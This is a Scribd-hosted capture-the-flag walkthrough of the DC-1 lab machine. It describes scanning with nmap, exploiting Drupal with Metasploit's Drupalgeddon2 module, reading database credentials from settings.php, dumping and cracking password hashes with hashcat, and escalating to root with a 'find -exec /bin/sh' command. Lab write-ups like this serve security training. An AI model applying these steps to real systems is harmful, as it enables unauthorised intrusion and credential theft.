Scribd
Upload
10 views8 pages

DC-1 Mukesh

The document outlines a step-by-step process for exploiting a target system running Drupal CMS using tools like NMAP and Metasploit. It details the discovery of open ports, gaining access through a reverse shell, and retrieving five flags by navigating through directories and databases. The final steps involve obtaining root permissions to access the last flag in the root directory.

Uploaded by

Suraj Kumar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
10 views8 pages

DC-1 Mukesh

The document outlines a step-by-step process for exploiting a target system running Drupal CMS using tools like NMAP and Metasploit. It details the discovery of open ports, gaining access through a reverse shell, and retrieving five flags by navigating through directories and databases. The final steps involve obtaining root permissions to access the last flag in the root directory.

Uploaded by

Suraj Kumar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 8

Step 1: Lets start by finding the IP:

we will use netdiscover

target ip — 192.168.0.109

Step 2: Scan our target :

we will use Advance NMAP search


The NMAP output shows us that there are 3 ports open: 22(SSH), 80(HTTP), 111(RPC)

We find that port 80 is running http, so we open the IP in our browser.

When we access the web service we find that the server is running Drupal CMS. As the target
system is running Drupal CMS, we can check if it is vulnerable to Drupalgeddon2 exploit.
We run the exploit using Metasploit on the target machine and successfully able to get a
reverse shell.

Step 3: Gaining access:

using Metasploit

use #1 : exploit/unix/webapp/drupal_drupalgeddon2
set the RHOSTS

we got the meterpreter shell

And we got our 1st flag .

we have to find 4 more flag to complete the machine, let’s do it

Lets open the flag1.txt to get the hint for flag 2


we have to search for config file for flag 2 , but here’s the catch we have to find a setting file
not literally config file :)

 we have to open sites directory

 then open default directory

and we got the settings.php file

we got
our flag2 :)

 For flag 3 we will use this credential to access my sql database


 In order to do so , we have to covert this meterpreter session to interactive shell we
will use python command
 python -c ‘import pty; pty.spawn(“/bin/bash”)’

we got the interactive


shell :)

 Now , we have to access the database


 mysql -u dbuser -p
 -u = username

 mysql command : show databases;

 use drupaldb;

 show tables;
 search for users in table

 select * from users;

Well, Drupal is also known to have very secure hashes. Are they secure enough? I let my
1070 TI GPU determine that. I downloaded hashcat to my Windows PC and the
rockyou.txt word list.

I didn’t have to wait too long for the admin’s password. The password was 53cr3t. I logged
in and under the content menu, I found the third flag.
 For Flag4 we have to go to home directory

To go to home directory just type: cd .. (4 times)

and we got our Flag4 :) . From the hint , it seems like we have to check root directory for
FLAG5 .

 In order to do so we have to get root permission to open root directory.


 we will be using this command to get root permission :
 find . -exec /bin/sh \; -quit

to check if
we got root permission or not , type whoami

 we got it :)
 Now at last , go to root directory and access the FLAG5
And its done , the 5th flag was the Final Flag .

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy